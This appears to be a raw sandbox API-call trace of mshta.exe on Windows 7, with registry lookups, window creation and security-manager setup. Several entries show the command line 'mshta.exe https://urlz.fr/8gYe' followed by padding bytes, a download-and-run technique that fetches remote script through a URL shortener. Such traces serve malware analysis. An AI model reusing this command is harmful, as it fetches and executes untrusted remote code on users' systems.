[0070.970] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.970] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.970] RegCloseKey (hKey=0x0) returned 0x6
[0070.970] RegCloseKey (hKey=0x0) returned 0x6
[0070.970] RegCloseKey (hKey=0x9c) returned 0x0
[0070.970] RegCloseKey (hKey=0x98) returned 0x0
[0070.970] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f300 | out: phkResult=0x33f300*=0x98) returned 0x0
[0070.970] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f304 | out: phkResult=0x33f304*=0x9c) returned 0x0
[0070.970] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.970] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c0 | out: phkResult=0x33f2c0*=0x0) returned 0x2
[0070.971] RegCloseKey (hKey=0x0) returned 0x6
[0070.971] RegCloseKey (hKey=0x0) returned 0x6
[0070.971] RegCloseKey (hKey=0x98) returned 0x0
[0070.971] RegCloseKey (hKey=0x9c) returned 0x0
[0070.971] GetSystemMetrics (nIndex=68) returned 4
[0070.971] GetSystemMetrics (nIndex=69) returned 4
[0070.971] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14
[0070.972] GetSystemDefaultLCID () returned 0x409
[0070.972] GetVersionExW (in: lpVersionInformation=0x33f264*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77e4e36c, dwMinorVersion=0x77e4e0d2, dwBuildNumber=0x74ccafd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f264*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0070.972] GetUserDefaultUILanguage () returned 0x409
[0070.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x33f1b4, cchData=16 | out: lpLCData="\x03") returned 16
[0070.973] GetKeyboardLayoutList (in: nBuff=32, lpList=0x33f1e4 | out: lpList=0x33f1e4) returned 1
[0070.973] GetSystemMetrics (nIndex=4096) returned 0
[0070.973] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f308 | out: phkResult=0x33f308*=0x9c) returned 0x0
[0070.973] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f30c | out: phkResult=0x33f30c*=0x98) returned 0x0
[0070.973] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c8 | out: phkResult=0x33f2c8*=0x0) returned 0x2
[0070.973] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f2c8 | out: phkResult=0x33f2c8*=0x0) returned 0x2
[0070.974] RegCloseKey (hKey=0x0) returned 0x6
[0070.974] RegCloseKey (hKey=0x0) returned 0x6
[0070.974] RegCloseKey (hKey=0x9c) returned 0x0
[0070.974] RegCloseKey (hKey=0x98) returned 0x0
[0070.974] GetModuleFileNameW (in: hModule=0x74790000, lpFilename=0x33f170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e
[0070.974] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a
[0070.974] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b
[0070.974] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d
[0070.974] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f
[0070.974] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e
[0070.974] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc1cc
[0070.974] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc1cd
[0070.974] GetDC (hWnd=0x0) returned 0x16010259
[0070.974] SHCreateShellPalette (hdc=0x0) returned 0x1080910
[0070.974] GetPaletteEntries (in: hpal=0x1080910, iStart=0x0, cEntries=0x100, pPalEntries=0x74cca494 | out: pPalEntries=0x74cca494) returned 0x100
[0070.974] SHGetInverseCMAP (in: pbMap=0x74cc8a7c, cbMap=0x4 | out: pbMap=0x74cc8a7c) returned 0x0
[0070.974] GetDeviceCaps (hdc=0x16010259, index=38) returned 32409
[0070.974] ReleaseDC (hWnd=0x0, hDC=0x16010259) returned 1
[0070.975] GetCurrentProcessId () returned 0xbf0
[0070.975] _vsnprintf (in: _DstBuf=0x33f6b4, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x33f37c | out: _DstBuf="#MSHTML#PERF#00000BF0") returned 21
[0070.975] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000BF0") returned 0x0
[0070.975] GetVersionExW (in: lpVersionInformation=0x33f398*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x8237f8, dwMinorVersion=0x100, dwBuildNumber=0x83de00, dwPlatformId=0x820000, szCSDVersion="A") | out: lpVersionInformation=0x33f398*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0070.975] GetModuleHandleW (lpModuleName="advapi32") returned 0x76490000
[0070.975] GetProcAddress (hModule=0x76490000, lpProcName="EventWrite") returned 0x77e80c59
[0070.975] GetProcAddress (hModule=0x76490000, lpProcName="EventRegister") returned 0x77e5f6ba
[0070.975] GetProcAddress (hModule=0x76490000, lpProcName="EventUnregister") returned 0x77e79241
[0070.975] EtwEventRegister () returned 0x0
[0070.975] EtwRegisterTraceGuidsW () returned 0x0
[0070.975] EtwRegisterTraceGuidsW () returned 0x0
[0070.976] EtwEventRegister () returned 0x0
[0070.977] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0x33f164 | out: lpdwHandle=0x33f164) returned 0x0
[0070.978] GetModuleHandleW (lpModuleName=0x0) returned 0x680000
[0070.978] GetModuleFileNameW (in: hModule=0x680000, lpFilename=0x33f170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0070.978] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe"
[0070.996] GetCurrentProcessId () returned 0xbf0
[0070.996] GetCurrentProcessId () returned 0xbf0
[0070.998] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xb8
[0070.998] GetLastError () returned 0x0
[0071.213] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xfc
[0071.213] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x110000
[0071.215] RegCloseKey (hKey=0x42) returned 0x0
[0071.215] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76220000
[0071.215] GetProcAddress (hModule=0x76220000, lpProcName="RegisterApplicationRestart") returned 0x7625b53c
[0071.215] lstrlenA (lpString="https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC") returned 41
[0071.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x822cce, cbMultiByte=-1, lpWideCharStr=0x171e00, cchWideChar=42 | out: lpWideCharStr="https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC") returned 42
[0071.215] RegisterApplicationRestart (pwzCommandline="https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC", dwFlags=0x0) returned 0x0
[0071.216] GetProcAddress (hModule=0x74790000, lpProcName="RunHTMLApplication") returned 0x747ee710
[0071.220] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\mshta.exe https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC"
[0071.234] OleInitialize (pvReserved=0x0) returned 0x0
[0071.242] IsWindow (hWnd=0x0) returned 0
[0071.243] RegisterClassW (lpWndClass=0x33fa1c) returned 0xc1ce
[0071.243] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x680000, lpParam=0x74cc9680) returned 0x10216
[0071.243] NtdllDefWindowProc_W () returned 0x0
[0071.243] NtdllDefWindowProc_W () returned 0x1
[0071.244] NtdllDefWindowProc_W () returned 0x0
[0071.247] NtdllDefWindowProc_W () returned 0x0
[0071.247] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x10216, hMenu=0x0, hInstance=0x680000, lpParam=0x74cc9680) returned 0x1021a
[0071.247] NtdllDefWindowProc_W () returned 0x0
[0071.247] NtdllDefWindowProc_W () returned 0x1
[0071.247] NtdllDefWindowProc_W () returned 0x0
[0071.248] NtdllDefWindowProc_W () returned 0x0
[0071.248] SetWindowLongW (hWnd=0x1021a, nIndex=-16, dwNewLong=-2100363264) returned 114229248
[0071.248] NtdllDefWindowProc_W () returned 0x0
[0071.248] NtdllDefWindowProc_W () returned 0x0
[0071.249] NtdllDefWindowProc_W () returned 0x0
[0071.249] NtdllDefWindowProc_W () returned 0x0
[0071.249] NtdllDefWindowProc_W () returned 0x0
[0071.249] NtdllDefWindowProc_W () returned 0x0
[0071.249] SetWindowPos (hWnd=0x1021a, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0071.249] NtdllDefWindowProc_W () returned 0x0
[0071.250] NtdllDefWindowProc_W () returned 0x0
[0071.250] NtdllDefWindowProc_W () returned 0x0
[0071.251] NtdllDefWindowProc_W () returned 0x0
[0071.252] NtdllDefWindowProc_W () returned 0x0
[0071.252] SendMessageW (hWnd=0x1021a, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0
[0071.252] NtdllDefWindowProc_W () returned 0x0
[0071.252] NtdllDefWindowProc_W () returned 0x0
[0071.254] PathRemoveArgsW (in: pszPath="https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC" | out: pszPath="https://urlz.fr/8gYe")
[0071.256] PathRemoveBlanksW (in: pszPath="https://urlz.fr/8gYe" | out: pszPath="https://urlz.fr/8gYe")
[0071.256] PathUnquoteSpacesW (in: lpsz="https://urlz.fr/8gYe" | out: lpsz="https://urlz.fr/8gYe") returned 0
[0071.257] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="https://urlz.fr/8gYe", ppmk=0x33fa7c*=0x0, dwFlags=0x1 | out: ppmk=0x33fa7c*=0x84fff0) returned 0x0
[0071.310] CoCreateInstance (in: rclsid=0x748c9770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7494b75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x74cc96d4 | out: ppv=0x74cc96d4*=0x854f58) returned 0x0
[0071.316] DllGetClassObject (in: rclsid=0x852e24*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75d3ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ed34 | out: ppv=0x33ed34*=0x74cc8cb0) returned 0x0
[0071.323] GetCurrentThreadId () returned 0xbf4
[0071.325] RegisterClassExW (param_1=0x33ebcc) returned 0xc1cf
[0071.326] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc1cf, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x74790000, lpParam=0x0) returned 0x1021c
[0071.326] GetWindowLongW (hWnd=0x1021c, nIndex=-20) returned 0
[0071.326] NtdllDefWindowProc_W () returned 0x1
[0071.326] NtdllDefWindowProc_W () returned 0x0
[0071.326] NtdllDefWindowProc_W () returned 0x0
[0071.326] NtdllDefWindowProc_W () returned 0x0
[0071.326] NtdllDefWindowProc_W () returned 0x0
[0071.327] CreateCompatibleDC (hdc=0x0) returned 0x28010919
[0071.327] GetDeviceCaps (hdc=0x28010919, index=90) returned 96
[0071.327] GetDeviceCaps (hdc=0x28010919, index=88) returned 96
[0071.327] GetSystemMetrics (nIndex=68) returned 4
[0071.327] GetSystemMetrics (nIndex=69) returned 4
[0071.327] GetSystemMetrics (nIndex=2) returned 17
[0071.327] GetSystemMetrics (nIndex=3) returned 17
[0071.327] GetStockObject (i=13) returned 0x18a002e
[0071.327] SelectObject (hdc=0x28010919, h=0x18a002e) returned 0x18a002e
[0071.327] GetTextMetricsW (in: hdc=0x28010919, lptm=0x33ec64 | out: lptm=0x33ec64) returned 1
[0071.327] SelectObject (hdc=0x28010919, h=0x18a002e) returned 0x18a002e
[0071.327] DeleteObject (ho=0x18a002e) returned 1
[0071.327] GetSystemDefaultLCID () returned 0x409
[0071.327] GetUserDefaultLCID () returned 0x409
[0071.327] GetACP () returned 0x4e4
[0071.327] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x33ebd8, cchData=41 | out: lpLCData="1") returned 2
[0071.327] _wtoi (_String="1") returned 1
[0071.327] RegCloseKey (hKey=0x0) returned 0x6
[0071.327] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x33ec2c, cchData=16 | out: lpLCData="0123456789") returned 11
[0071.328] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x74ccb038, fWinIni=0x0 | out: pvParam=0x74ccb038) returned 1
[0071.328] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x33eca0, fWinIni=0x0 | out: pvParam=0x33eca0) returned 1
[0071.328] GetSystemWindowsDirectoryW (in: lpBuffer=0x33eaac, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
[0071.328] lstrlenW (lpString="C:\\Windows") returned 10
[0071.328] lstrlenW (lpString="\\WindowsShell.manifest") returned 22
[0071.328] CreateActCtxW (pActCtx=0x33ea88) returned 0x854154
[0071.330] ActivateActCtx (in: hActCtx=0x854154, lpCookie=0x33ea58 | out: hActCtx=0x854154, lpCookie=0x33ea58) returned 1
[0071.330] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x745f0000
[0071.830] DeactivateActCtx (dwFlags=0x0, ulCookie=0x19520001) returned 1
[0071.830] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb
[0071.830] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32
[0071.830] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8
[0071.831] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32
[0071.831] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x33e6b8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0071.831] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33e8c0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0071.831] GetCurrentProcess () returned 0xffffffff
[0071.831] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x33eac8, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9
[0071.831] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe"
[0071.831] FindAtomW (lpString="TridentEnableHiRes") returned 0x0
[0071.831] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x33e6a4, pvData=0x33e6b0, pcbData=0x33e6ac*=0x4 | out: pdwType=0x33e6a4*=0x0, pvData=0x33e6b0, pcbData=0x33e6ac*=0x4) returned 0x2
[0071.831] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e61c | out: phkResult=0x33e61c*=0x1e0) returned 0x0
[0071.832] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e620 | out: phkResult=0x33e620*=0x1dc) returned 0x0
[0071.832] RegOpenKeyExW (in: hKey=0x1dc, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x33e5dc | out: phkResult=0x33e5dc*=0x0) returned 0x2
[0071.832] RegOpenKeyExW (in: hKey=0x1e0, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x33e5dc | out: phkResult=0x33e5dc*=0x0) returned 0x2
[0071.832] RegCloseKey (hKey=0x0) returned 0x6
[0071.832] RegCloseKey (hKey=0x0) returned 0x6
[0071.832] RegCloseKey (hKey=0x1e0) returned 0x0
[0071.832] RegCloseKey (hKey=0x1dc) returned 0x0
[0071.832] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0071.832] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0071.832] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0071.832] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0071.832] GetCurrentThreadId () returned 0xbf4
[0071.833] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc1d0
[0071.833] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1
[0071.834] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x74cc8cd4, dwReserved=0x0 | out: ppSM=0x74cc8cd4*=0x855ea0) returned 0x0
[0071.840] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33e9cc | out: ppURI=0x33e9cc*=0x84c09c) returned 0x0
[0071.840] IUri:GetPropertyDWORD (in: This=0x84c09c, uriProp=0x11, pdwProperty=0x33e9b4, dwFlags=0x0 | out: pdwProperty=0x33e9b4*=0x11) returned 0x0
[0071.840] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x85568c, dwReserved=0x0 | out: ppSM=0x85568c*=0x856f08) returned 0x0
[0071.842] IInternetSecurityManager:SetSecuritySite (This=0x856f08, pSite=0x855694) returned 0x0
[0071.842] IUnknown:AddRef (This=0x855694) returned 0x28
[0071.842] IUnknown:QueryInterface (in: This=0x855694, riid=0x75ad61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33e984 | out: ppvObject=0x33e984*=0x855698) returned 0x0
[0071.842] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x856f30 | out: ppvObject=0x856f30*=0x0) returned 0x80004002
[0071.842] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x856f2c | out: ppvObject=0x856f2c*=0x0) returned 0x80004002
[0071.842] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x856f28 | out: ppvObject=0x856f28*=0x0) returned 0x80004002
[0071.842] IUnknown:Release (This=0x855698) returned 0x0
[0071.842] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="about:blank", pbSecurityId=0x33ea20, pcbSecurityId=0x33ea14*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33ea20*=0x61, pcbSecurityId=0x33ea14*=0xf) returned 0x0
[0071.856] DllGetClassObject (in: rclsid=0x852e58*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x33dfa0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33d658 | out: ppv=0x33d658*=0x74cc8c70) returned 0x0
[0071.856] IUnknown:AddRef (This=0x74cc8c70) returned 0x1
[0071.856] IUnknown:Release (This=0x74cc8c70) returned 0x1
[0071.856] IUnknown:QueryInterface (in: This=0x74cc8c70, riid=0x75ac4430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e21c | out: ppvObject=0x33e21c*=0x74cc8c70) returned 0x0
[0071.856] IUnknown:Release (This=0x74cc8c70) returned 0x1
[0071.856] IUnknown:QueryInterface (in: This=0x74cc8c70, riid=0x75aeaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e3dc | out: ppvObject=0x33e3dc*=0x74cc8c7c) returned 0x0
[0071.856] IUnknown:Release (This=0x74cc8c70) returned 0x1
[0071.856] IInternetProtocolInfo:ParseUrl (in: This=0x74cc8c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x843720, cchResult=0xc, pcchResult=0x33e424, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x33e424*=0xc) returned 0x0
[0071.856] IUnknown:Release (This=0x74cc8c7c) returned 0x1
[0071.857] DllGetClassObject (in: rclsid=0x852e58*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75ac4430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e2f0 | out: ppv=0x33e2f0*=0x74cc8c70) returned 0x0
[0071.857] IUnknown:QueryInterface (in: This=0x74cc8c70, riid=0x75aeaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e3dc | out: ppvObject=0x33e3dc*=0x74cc8c7c) returned 0x0
[0071.857] IUnknown:Release (This=0x74cc8c70) returned 0x1
[0071.857] IInternetProtocolInfo:ParseUrl (in: This=0x74cc8c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x843720, cchResult=0xc, pcchResult=0x33e434, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33e434*=0x0) returned 0x800c0011
[0071.857] IUnknown:Release (This=0x74cc8c7c) returned 0x1
[0071.857] IUnknown:Release (This=0x84c09c) returned 0x2
[0071.857] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x33e9f4, dwReserved=0x0 | out: ppSM=0x33e9f4*=0x857580) returned 0x0
[0071.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33eba4 | out: phkResult=0x33eba4*=0x21c) returned 0x0
[0071.858] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33eba8 | out: phkResult=0x33eba8*=0x228) returned 0x0
[0071.858] RegOpenKeyExW (in: hKey=0x228, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x33eb64 | out: phkResult=0x33eb64*=0x0) returned 0x2
[0071.858] RegOpenKeyExW (in: hKey=0x21c, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x33eb64 | out: phkResult=0x33eb64*=0x0) returned 0x2
[0071.858] RegCloseKey (hKey=0x0) returned 0x6
[0071.858] RegCloseKey (hKey=0x0) returned 0x6
[0071.858] RegCloseKey (hKey=0x21c) returned 0x0
[0071.858] RegCloseKey (hKey=0x228) returned 0x0
[0071.859] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33e9e8 | out: ppURI=0x33e9e8*=0x84c09c) returned 0x0
[0071.859] DllGetClassObject (in: rclsid=0x852e58*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75ac4430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e2c0 | out: ppv=0x33e2c0*=0x74cc8c70) returned 0x0
[0071.859] IUnknown:QueryInterface (in: This=0x74cc8c70, riid=0x75aeaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e3ac | out: ppvObject=0x33e3ac*=0x74cc8c7c) returned 0x0
[0071.859] IUnknown:Release (This=0x74cc8c70) returned 0x1
